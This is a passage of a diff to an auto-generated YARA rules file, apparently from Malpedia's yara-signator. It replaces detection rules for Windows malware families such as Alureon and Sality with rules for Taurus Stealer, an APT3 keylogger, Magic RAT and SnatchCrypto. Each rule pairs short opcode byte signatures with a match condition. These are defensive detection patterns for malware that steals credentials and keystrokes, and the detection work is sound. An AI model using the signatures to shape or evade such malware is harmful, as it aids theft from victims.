+		$sequence_1 = { 894704 8b4804 8901 837dcc10 c745fcffffffff 720c }
+		$sequence_2 = { 51 c745fc00000000 e8???????? 83c408 837de810 720c 8b55d4 }
+		$sequence_3 = { c706???????? 8bc6 5e 8be5 5d c3 8d45fc }
+		$sequence_4 = { 33d2 eb02 8b10 8b4518 85c0 740c }
+		$sequence_5 = { 03ce 51 8b4b6c 57 51 ff15???????? }
+		$sequence_6 = { c706???????? e8???????? 6a30 c745fc00000000 c7462000000000 e8???????? 83c404 }
+		$sequence_7 = { 53 8d9564feffff 52 8d8dd4feffff e8???????? 8b7010 838d20feffff01 }
+		$sequence_8 = { c747140f000000 895f10 881f 833e10 7315 8b56fc }
+		$sequence_9 = { e8???????? 83c404 c785ccfeffff0f000000 899dc8feffff 889db8feffff c645fc03 39b578feffff }
 
 	condition:
-		7 of them and filesize < 4722688
+		7 of them and filesize < 424960
 }
-rule MALPEDIA_Win_Alureon_Auto : FILE
+rule MALPEDIA_Win_Strikesuit_Gift_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "117dd26b-ed24-54a6-81be-757a69affa6d"
+		id = "07a5f9ca-40c1-5bef-81cd-9b2edfb79941"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.alureon_auto.yar#L1-L175"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strikesuit_gift"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.strikesuit_gift_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "9eb93e11f255dfd7233db5216742e55bd1642de34cc4ea7abe163cf90bc56063"
+		logic_hash = "38158a27b97c948ddd0e7a00ce8b9fd84a0eeadae064b8c5755cc04130a6bdf7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132590,38 +132425,32 @@ rule MALPEDIA_Win_Alureon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895d14 7439 49 d1e9 41 894df8 8b4d14 }
-		$sequence_1 = { 6a60 59 32c0 8d7c2420 }
-		$sequence_2 = { 45 33d2 0fb74158 d1e8 44 }
-		$sequence_3 = { 49 8d541d2c 45 8be3 49 8bfb }
-		$sequence_4 = { 8bc3 c1e808 88442440 8954242c }
-		$sequence_5 = { 68000010c0 8d45fc 50 c745d818000000 895ddc c745e440000000 895de8 }
-		$sequence_6 = { 49 8bfb 44 2b6330 8b0a 48 }
-		$sequence_7 = { 668b85a0fbffff 8b4df4 8b3d???????? 66894108 }
-		$sequence_8 = { 5f 8d442454 89442428 8d442420 50 }
-		$sequence_9 = { 75f9 ff75b4 8d4dbc 2bc6 8b35???????? 51 }
-		$sequence_10 = { 50 68???????? a4 ff15???????? 8bc3 8d7001 8a08 }
-		$sequence_11 = { ff742428 ff15???????? 8bf8 83ffff 7507 33c0 eb43 }
-		$sequence_12 = { beff000000 33db 56 8d85f9fcffff 53 50 }
-		$sequence_13 = { 8d9c2400050000 e8???????? 8bc3 50 33db 53 53 }
-		$sequence_14 = { 8bf8 83c418 85ff 7504 32c0 }
-		$sequence_15 = { e8???????? be00030000 83c418 8975ec c745f000010000 895df8 56 }
+		$sequence_0 = { 06 2000100000 1f40 2801000006 }
+		$sequence_1 = { 7245000070 7e1b00000a 6f2500000a 1305 1105 7249000070 }
+		$sequence_2 = { 2d3f 08 8e 69 05 59 }
+		$sequence_3 = { 2801000006 0b 16 0c 2b0e 07 08 }
+		$sequence_4 = { 7503000002 0d 09 7e1e00000a 6f0c000006 }
+		$sequence_5 = { a2 1105 17 58 1305 1105 08 }
+		$sequence_6 = { 07 d003000002 282000000a 282100000a }
+		$sequence_7 = { 1107 7e01000004 1b 6f1800000a }
+		$sequence_8 = { 731500000a 0b 16 0c }
+		$sequence_9 = { 03 282c00000a 0a 16 0b 2b19 02 }
 
 	condition:
-		7 of them and filesize < 278528
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Boatlaunch_Auto : FILE
+rule MALPEDIA_Win_Bh_A006_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b0d65d7-386e-5181-abff-96bda8de10ae"
+		id = "f37d05fc-fa47-5fd7-bb26-823ae04185f6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boatlaunch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.boatlaunch_auto.yar#L1-L171"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bh_a006"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bh_a006_auto.yar#L1-L100"
 		license_url = "N/A"
-		logic_hash = "adf615ca940a4845de7b709cb5b628615811519e57950596633d26b59f2f2942"
+		logic_hash = "e3efc1dc1d935b6057dbf735dfbafda7bd291fd107bd55d1d22343cc85bf6fea"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132635,40 +132464,32 @@ rule MALPEDIA_Win_Boatlaunch_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7430c00000000 c7431000000000 c7431400000000 8d45f0 50 8d45d8 }
-		$sequence_1 = { 8345e802 4b 85db 75af eb05 e9???????? }
-		$sequence_2 = { 0f84b1000000 8b4878 85c9 0f84a6000000 894dec 03cf 894df0 }
-		$sequence_3 = { 7502 48ab 488bfe ffcb 85db }
-		$sequence_4 = { 488b4dd0 e8???????? 488b45d8 488d6528 415b }
-		$sequence_5 = { 8b45e4 03701c 2b75ec 0375e4 ad 85c0 7407 }
-		$sequence_6 = { 448b45fc e8???????? 48894500 48c7c105000000 }
-		$sequence_7 = { 488d6c2430 48c745f800000000 488d35901e0000 488bfe bb40000000 }
-		$sequence_8 = { 488905???????? 48c7c001000000 488d6500 5d }
-		$sequence_9 = { c745f800000000 8d5ddc c70318000000 c7430400000000 }
-		$sequence_10 = { 8d85e0eeffff 50 e8???????? 83c404 53 }
-		$sequence_11 = { 5a 59 5b 5d c3 48894c2408 4855 }
-		$sequence_12 = { ff75f8 e8???????? 81fb02010000 7507 c745fc01000000 8b45fc 5f }
-		$sequence_13 = { c7431400000000 8d45f4 50 8d45dc 50 68ff0f1f00 }
-		$sequence_14 = { 48c7c164000000 e8???????? e9???????? 488d6500 }
-		$sequence_15 = { 4150 4151 4152 4153 4881ec78110000 488dac2480000000 48c745e800000000 }
+		$sequence_0 = { 8bca 2b08 03cb 8930 }
+		$sequence_1 = { 6683bdecdfffff00 8dbdecdfffff 7436 57 }
+		$sequence_2 = { 88041a 42 884517 8955f4 e9???????? 2bf0 }
+		$sequence_3 = { 85ff 7472 8d45fc 50 }
+		$sequence_4 = { 8b95e4deffff 59 83e201 c1e202 6a04 59 }
+		$sequence_5 = { 8985d4ddffff 8985d8ddffff 8985dcddffff 8945fc }
+		$sequence_6 = { 898de4deffff 3bcb 7cbb 8bb5d8deffff 33db 8b85d0deffff 56 }
+		$sequence_7 = { 50 68???????? 8d85b8f5ffff 50 e8???????? 85c0 7922 }
 
 	condition:
-		7 of them and filesize < 33792
+		7 of them and filesize < 430080
 }
-rule MALPEDIA_Win_Silence_Auto : FILE
+rule MALPEDIA_Win_Danbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "76b63199-cbb5-5cad-8141-09f38a80148d"
+		id = "20935e71-f906-54b9-9bae-c4a4caef1aba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.silence"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.silence_auto.yar#L1-L414"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.danbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.danbot_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "ca0b6959891210b6329cb5e65869406530d9a0a78093846319a985c972eb2ee3"
+		logic_hash = "acd94691ea40c5baca6316ac758413a2314f96bf1ccb4eb7ca1bd69319a91f06"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -132680,72 +132501,34 @@ rule MALPEDIA_Win_Silence_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? cc 8325????????00 c3 6a08 }
-		$sequence_1 = { 8a4801 40 84c9 75f4 eb05 }
-		$sequence_2 = { 50 6a00 6a00 68???????? c745fc00000000 }
-		$sequence_3 = { 50 683f020f00 6a00 68???????? 6801000080 ff15???????? 68???????? }
-		$sequence_4 = { 6801000080 ff15???????? 56 8d85f8feffff 50 }
-		$sequence_5 = { ff15???????? 6a00 6800000004 6a00 }
-		$sequence_6 = { 7502 f3c3 e9???????? e8???????? e9???????? 6a14 68???????? }
-		$sequence_7 = { 68???????? ffd6 8b45fc 85c0 }
-		$sequence_8 = { 6800040000 ff30 c745fc00000000 57 ff15???????? }
-		$sequence_9 = { 55 8bec 51 56 8b35???????? 6a00 6a00 }
-		$sequence_10 = { 8b35???????? 6a00 6a00 6a00 6a00 8d45fc }
-		$sequence_11 = { 84c9 75f4 eb0d 803800 7408 8a5a01 42 }
-		$sequence_12 = { 3acb 740a 8a4801 40 }
-		$sequence_13 = { 5b 5d c3 c60200 42 }
-		$sequence_14 = { 8bf8 6a00 57 ff15???????? 8d45fc }
-		$sequence_15 = { 50 56 ff15???????? 8b85b8f7ffff 85c0 75b6 ffb5acf7ffff }
-		$sequence_16 = { 8d85b8f7ffff 50 6800080000 8d85bcf7ffff 50 }
-		$sequence_17 = { 6a00 8d8db4f7ffff 51 50 8d85bcf7ffff }
-		$sequence_18 = { e8???????? ff76f8 e8???????? 83c41c 895ef8 897ef0 5b }
-		$sequence_19 = { 8b46f8 0346f4 57 ff7508 50 }
-		$sequence_20 = { 8b01 52 8d95f0fdffff 52 }
-		$sequence_21 = { e8???????? ff37 8b35???????? ffd6 }
-		$sequence_22 = { 898df8fbffff 8d8dfcfbffff 51 ffb5f0fbffff }
-		$sequence_23 = { ff5210 8b17 8bcf ff5208 }
-		$sequence_24 = { 52 ff10 8b95ecfdffff 03fa }
-		$sequence_25 = { e8???????? 8b4ef4 8bc7 2bc1 }
-		$sequence_26 = { 99 83e203 03c2 c1f802 89442448 }
-		$sequence_27 = { ff15???????? ba180c0000 b940000000 ff15???????? }
-		$sequence_28 = { 8b05???????? d3e0 8b0d???????? 03c8 }
-		$sequence_29 = { d3e0 0fb6c8 8b05???????? d3e0 }
-		$sequence_30 = { e8???????? ba00040000 b940000000 ff15???????? }
-		$sequence_31 = { ff15???????? 41b804010000 488d542430 488d4c2430 ff15???????? 85c0 }
-		$sequence_32 = { d3f8 0fb60d???????? d3e0 85c0 }
-		$sequence_33 = { ff15???????? 488d542430 488d8c2440020000 ff15???????? }
-		$sequence_34 = { 8d0441 33d2 b905000000 f7f1 }
-		$sequence_35 = { 750e 68???????? ff15???????? c20800 53 8b1d???????? }
-		$sequence_36 = { 8bec ff4d08 755d 833d????????04 }
-		$sequence_37 = { c705????????00000000 c705????????04000000 ff15???????? 85c0 750b }
-		$sequence_38 = { 7507 68???????? ffd7 6a00 6a00 6a01 }
-		$sequence_39 = { 53 8b1d???????? 57 0f57c0 }
-		$sequence_40 = { 68???????? ff15???????? a3???????? 85c0 750e 68???????? ff15???????? }
-		$sequence_41 = { ff15???????? 68c0d40100 ff15???????? e9???????? }
-		$sequence_42 = { ffd3 5e 85c0 7507 68???????? ffd7 5f }
-		$sequence_43 = { c705????????00000000 c705????????00000000 ffd3 8b3d???????? }
-		$sequence_44 = { 0305???????? 0b45f0 3305???????? a3???????? }
-		$sequence_45 = { 03048db0354200 eb05 b8???????? f6402820 }
-		$sequence_46 = { 03048db0354200 eb02 8bc6 80782900 }
-		$sequence_47 = { 03048db0354200 50 ff15???????? 5d }
+		$sequence_0 = { 4c8965f0 4c896df8 448865e0 488d5580 488d4d00 e8???????? }
+		$sequence_1 = { 4585c0 0f840e020000 89bb88000000 4183f803 0f82b6000000 8b8394000000 85c0 }
+		$sequence_2 = { 55 56 57 4881ec90000000 48c7442420feffffff 49895b18 488b05???????? }
+		$sequence_3 = { 483bd7 720e 48ffc2 4d8bc6 498b0f e8???????? }
+		$sequence_4 = { 488bda 33c0 488b5110 4983c8ff 89442420 48894310 48c743180f000000 }
+		$sequence_5 = { ffd3 99 33c2 2bc2 89442430 448be0 4c89642450 }
+		$sequence_6 = { eb03 488bd9 8b4018 25c0010000 410f100424 beffff0000 83f840 }
+		$sequence_7 = { 488bce ffd3 90 488b742478 488b06 488b5838 488bcb }
+		$sequence_8 = { 48897310 4c897318 408833 0f1007 0f1103 0f104f10 0f114b10 }
+		$sequence_9 = { 498bcd e8???????? 4533d2 84c0 741d 418adc 488bcf }
 
 	condition:
-		7 of them and filesize < 70128640
+		7 of them and filesize < 1492992
 }
-rule MALPEDIA_Win_Sality_Auto : FILE
+rule MALPEDIA_Win_Magic_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "491e3727-8d5f-59a5-be7f-6df769a7e7b0"
+		id = "982c6058-0233-5962-b1e1-ee61f14d1ffc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sality_auto.yar#L1-L222"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magic_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.magic_rat_auto.yar#L1-L109"
 		license_url = "N/A"
-		logic_hash = "69c1f81399935d5f7c9bd23257cd0c140ba6f95de6444c6618514cda674397de"
-		score = 75
-		quality = 73
+		logic_hash = "f70d7be02c5b390e3f3dfd5324abdc86d2919bb20841095d121cf5bf228f41f4"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -132757,46 +132540,32 @@ rule MALPEDIA_Win_Sality_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 81f201a00000 668955f8 eb0b 668b45f8 66d1e8 668945f8 }
-		$sequence_1 = { 6a67 e8???????? 83c410 8b4dfc 03c8 894dfc }
-		$sequence_2 = { 51 ff15???????? e9???????? 68581b0000 }
-		$sequence_3 = { 51 ff15???????? eb14 8d95f0fdffff }
-		$sequence_4 = { 81ec88010000 57 c78578feffff00000000 c685fcfeffff00 b940000000 33c0 8dbdfdfeffff }
-		$sequence_5 = { 6a66 e8???????? 83c410 8b55fc 03d0 8955fc eb37 }
-		$sequence_6 = { 0f8447010000 d1ea 7307 4e }
-		$sequence_7 = { 51 ff15???????? e8???????? 25ffff0000 }
-		$sequence_8 = { 7513 8bc2 83e804 8b00 8906 }
-		$sequence_9 = { 8920 896804 8d9dba114000 895808 }
-		$sequence_10 = { 035c240c 33c0 8b3b 037c240c 8b742410 }
-		$sequence_11 = { 8bf2 8bf8 50 ff95c5144000 8bc8 f3a6 61 }
-		$sequence_12 = { 52 ff953a144000 e8???????? 8907 }
-		$sequence_13 = { 646789260000 8b74240c 66813e4d5a 0f858c000000 03763c 813e50450000 }
-		$sequence_14 = { 8b7c2410 b996000000 32c0 f2ae 8bcf }
-		$sequence_15 = { 59 83c304 40 3b4218 75e2 3b4218 }
-		$sequence_16 = { 010d???????? 83c004 5f 5e }
-		$sequence_17 = { 00fb fb 804880bc 280d???????? }
-		$sequence_18 = { 0306 50 8b4e04 8d5608 }
-		$sequence_19 = { 0306 50 8d5604 e8???????? }
-		$sequence_20 = { 0007 7307 c607ff 8ac1 }
-		$sequence_21 = { 014304 c3 53 56 }
-		$sequence_22 = { 0202 7466 0fb77202 8b7a04 }
-		$sequence_23 = { 031e ff7608 ff7604 e8???????? }
+		$sequence_0 = { 5e 5f 5d c3 660f28c8 f20f5c0d???????? }
+		$sequence_1 = { 89c3 e8???????? 660fefc0 f20f2ac3 }
+		$sequence_2 = { 660f28d8 f20f5c1d???????? f20f2cc3 660fefdb }
+		$sequence_3 = { 894664 8b4368 894668 8b436c }
+		$sequence_4 = { c1e008 29d0 c1f810 84c0 }
+		$sequence_5 = { 8b12 83fa01 740a 83fa02 7405 83fa03 }
+		$sequence_6 = { 0fb6442425 0fb6542427 c1e018 c1e210 09d0 }
+		$sequence_7 = { 8b02 83c001 83f801 0f8721010000 }
+		$sequence_8 = { be02000000 e8???????? 84c0 75d5 }
+		$sequence_9 = { 7410 66c1e802 0fb7c0 69d07b140000 }
 
 	condition:
-		7 of them and filesize < 1523712
+		7 of them and filesize < 41843712
 }
-rule MALPEDIA_Win_Cosmicduke_Auto : FILE
+rule MALPEDIA_Win_Keylogger_Apt3_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3cb396e5-37a7-5104-9052-2cb8d08028c4"
+		id = "96f37009-369b-5f17-a68b-4eb5c0d4026d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cosmicduke_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.keylogger_apt3_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "c91b7a120fba1263ab464236cd77e48a69e2be7cc7ffc669f627390a309044cd"
+		logic_hash = "023590d599979615d817aedf4414560e8504e62badef12c9dd3c7d358dc03318"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132810,32 +132579,32 @@ rule MALPEDIA_Win_Cosmicduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 895df4 53 33f6 885dfb ff15???????? 85c0 0f8591000000 }
-		$sequence_1 = { eb0e 68???????? 8d85c0f9ffff 50 ffd3 68???????? 8d85d0fdffff }
-		$sequence_2 = { 68???????? 8d85f4fdffff 50 ff15???????? 8d85ecfbffff 50 }
-		$sequence_3 = { 7443 68???????? 8d842448020000 50 ffd6 85c0 7438 }
-		$sequence_4 = { 68???????? 6a01 6a01 68???????? e8???????? ba01000080 8bc8 }
-		$sequence_5 = { 668b044510984200 8b4dfc 6689044e 33c0 ff4d0c 75d2 8b4dfc }
-		$sequence_6 = { e8???????? 8b442450 8944240c 8d44240c 50 8bfe 8d442450 }
-		$sequence_7 = { 68???????? 50 6801000080 e8???????? e8???????? 3d09030000 7515 }
-		$sequence_8 = { ff15???????? 83c410 6a00 ff742434 68???????? e8???????? c644245c00 }
-		$sequence_9 = { 8d442424 50 8b442424 68???????? 57 895c2448 }
+		$sequence_0 = { 50 ffd7 8b4e08 6a08 51 ffd7 }
+		$sequence_1 = { 8b9c2430040000 55 8bac2430040000 56 57 8bbc2434040000 6800010000 }
+		$sequence_2 = { 52 ffd7 8b0d???????? 8d442424 50 51 }
+		$sequence_3 = { 8d45f0 50 e8???????? cc e8???????? 8b4004 c3 }
+		$sequence_4 = { e8???????? 55 e8???????? 68???????? e8???????? 8b8c2440020000 83c40c }
+		$sequence_5 = { 52 ffd7 a1???????? 896844 8b9eac010000 85db 742e }
+		$sequence_6 = { 52 e8???????? 8d862c020000 50 8d4c242c 68???????? 51 }
+		$sequence_7 = { 8d7c00ff 3bc7 89442418 0f8dc6000000 8b542414 8bd8 69db14010000 }
+		$sequence_8 = { 68???????? 52 ffd7 8b0d???????? 8d442438 50 }
+		$sequence_9 = { e8???????? 83c404 8b442414 6a00 6a00 6a10 8d54244c }
 
 	condition:
-		7 of them and filesize < 456704
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Kurton_Auto : FILE
+rule MALPEDIA_Win_Bohmini_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d9353d3d-fdf8-56bf-b9b4-d5c14e22748b"
+		id = "7ffa4356-333d-5cd0-8977-11f17aa9ceda"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kurton_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bohmini"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bohmini_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "070c043684321322d3719fa588bcbbaeb820fca4094babc856258c0a6bac0e61"
+		logic_hash = "4b7b42d940efc962d3653e13f1a5647032ad0ceec459f0054e3c714b4efdf65b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132849,32 +132618,32 @@ rule MALPEDIA_Win_Kurton_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 57 e8???????? 68???????? e8???????? 83c404 }
-		$sequence_1 = { 52 ff15???????? 8b44241c 3bc3 7407 50 }
-		$sequence_2 = { 57 7355 8bc1 c1f805 8d3c85a05b0210 8bc1 }
-		$sequence_3 = { 8d4c240c 50 51 6a1f 52 }
-		$sequence_4 = { 83e103 f3a4 8d4c240c e8???????? 8d4c2448 }
-		$sequence_5 = { 8bce e8???????? 84c0 0f84d4000000 8bce e8???????? 84c0 }
-		$sequence_6 = { 0f8498feffff bf???????? 83c9ff 33c0 }
-		$sequence_7 = { 33c0 c68414c400000000 8bac24c8020000 f2ae f7d1 }
-		$sequence_8 = { 3ac3 0f84d9000000 3cff 0f84d1000000 fec8 }
-		$sequence_9 = { 57 55 8d5e10 8974241c 8bcb 8803 e8???????? }
+		$sequence_0 = { ffd5 85c0 7503 ff430c 8b36 85f6 }
+		$sequence_1 = { 8d442408 c744240824020000 50 56 e8???????? 85c0 741f }
+		$sequence_2 = { 57 51 6a00 6a00 ff15???????? 85c0 }
+		$sequence_3 = { 50 8d542424 51 52 8d442424 6aff 50 }
+		$sequence_4 = { 33d0 8855fc 8d742600 8b4df0 034df8 8a55fc 8811 }
+		$sequence_5 = { c74424080c000000 c744241000000000 8944240c ff15???????? 8b542404 }
+		$sequence_6 = { 85c0 7529 8d442400 56 50 e8???????? 8bf0 }
+		$sequence_7 = { ffd6 8b3d???????? 50 ffd7 55 6a00 }
+		$sequence_8 = { 837e0c0a 7e47 8b4e08 51 e8???????? 83c404 }
+		$sequence_9 = { 8d442418 50 56 e8???????? eb0b }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Maudi_Auto : FILE
+rule MALPEDIA_Win_Taurus_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1d89cb82-59a5-5a2e-ac6c-c7d75443bace"
+		id = "b1a1c877-dafe-5bd8-aa9e-f033e2a7d793"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maudi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.maudi_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.taurus_stealer_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "d20863b5f36f8cd108ded6d29f5c3bed96160b9b4abc34b0d10161e337344d4d"
+		logic_hash = "45f5adaf95071a60a27cbbf5888b0c101a82ad499a857b2070bb83a96bceb96f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132888,32 +132657,32 @@ rule MALPEDIA_Win_Maudi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 61 6886180000 59 80740fff36 e2f9 }
-		$sequence_1 = { 5d bf???????? 6a40 6800100000 6886180000 6a00 }
-		$sequence_2 = { 89e5 5d 8b80a4000000 83f806 7546 }
-		$sequence_3 = { 52 68???????? 87d1 87ca 51 }
-		$sequence_4 = { 55 89e5 5d 8b80a4000000 83f806 7546 }
-		$sequence_5 = { 6804010000 56 68???????? 87d1 }
-		$sequence_6 = { 89e5 81ec04010000 56 55 89e5 5d 89e6 }
-		$sequence_7 = { ff25???????? 83c418 6a00 57 56 68???????? 87d1 }
-		$sequence_8 = { 59 59 ff25???????? 68???????? 87d1 87ca }
-		$sequence_9 = { 59 e9???????? 55 89e5 5d bf???????? 6a40 }
+		$sequence_0 = { 0f9445d1 e8???????? 668945d2 8d4d94 8b45c4 8db778020000 3b45c8 }
+		$sequence_1 = { 8d45d0 50 8d45f4 50 e8???????? 50 8d45b8 }
+		$sequence_2 = { 8bce e8???????? 8bd0 c745f829674844 b129 c745fc4c130900 33c0 }
+		$sequence_3 = { 50 8d85c0feffff 50 8d4dcb e8???????? 8b85c4feffff 8d8d40ffffff }
+		$sequence_4 = { 33c0 304c05ed 40 83f806 7305 8a4dec }
+		$sequence_5 = { e8???????? 8bd0 c744242f74271706 6a07 58 88442436 b174 }
+		$sequence_6 = { f7c300200000 7414 81e3ffdfffff 8d8d04ffffff 895df8 e8???????? }
+		$sequence_7 = { 57 ffd0 8bf8 897d0c 83ffff 746f 8b9530ffffff }
+		$sequence_8 = { c1fa06 8bc7 83e03f 6bc838 8b049578c14300 f644082801 7421 }
+		$sequence_9 = { c74654c3280308 c7465881120d0e c7465ce58b8009 c74660d5208b07 c74664359ac202 c74668f19ad809 c7466ca13ba208 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Polyglotduke_Auto : FILE
+rule MALPEDIA_Win_Snatchcrypto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5c295965-8bd5-593f-b721-c3ba45184139"
+		id = "606aa04d-2534-5b9c-a7ea-236168d717b6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglotduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.polyglotduke_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.snatchcrypto_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "02803fa0214e774a255c3af744ecd162ea9c7b022e39aa2c1104c52737c743df"
+		logic_hash = "821ad44e204c834b4eeced1dd22888563234f9fd380bbb4b883fee2940f1717e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132927,32 +132696,32 @@ rule MALPEDIA_Win_Polyglotduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bcb 4803f7 e8???????? eb38 488d0d190f0100 e8???????? b905000000 }
-		$sequence_1 = { f6431840 4c8d0d0269ffff 0f85a5000000 488bcb e8???????? 488d15fdd30000 413bc6 }
-		$sequence_2 = { 4c8bf8 e8???????? 488d0d86d20000 4c8bf0 e8???????? 488d0d7fd20000 4c8be8 }
-		$sequence_3 = { 48894608 4803c8 e8???????? 8b54244c }
-		$sequence_4 = { 8a4f02 4c8bf0 884803 488bcf e8???????? 8b06 }
-		$sequence_5 = { 4c8d0d35db0000 33c0 498bd1 448d4008 3b0a 742b ffc0 }
-		$sequence_6 = { ff15???????? 488b5c2430 488bcb 8d78fb ff15???????? 03c7 }
-		$sequence_7 = { 498bd5 498bce ff15???????? 33ff }
-		$sequence_8 = { 7e74 817d0063736de0 7528 48833d????????00 741e 488d0d79db0000 }
-		$sequence_9 = { e9???????? 488bca ff15???????? 83f847 75eb 488bcd ff15???????? }
+		$sequence_0 = { ff15???????? 4889ae60030000 488b9330060000 488d0d6e0a0300 e8???????? 4889442460 }
+		$sequence_1 = { e8???????? 488d4d81 33d2 41b803010000 c6458000 e8???????? 488d8db1020000 }
+		$sequence_2 = { c1c80b 410bca 458bc2 4433c8 4123ce 418bc4 c1c806 }
+		$sequence_3 = { 740d 4c39b380010000 0f858b000000 bfc4feffff 488b4310 4c8b7c2470 4c8b6c2478 }
+		$sequence_4 = { 7499 488d1597280600 488bcf e8???????? 85c0 7486 488d158c280600 }
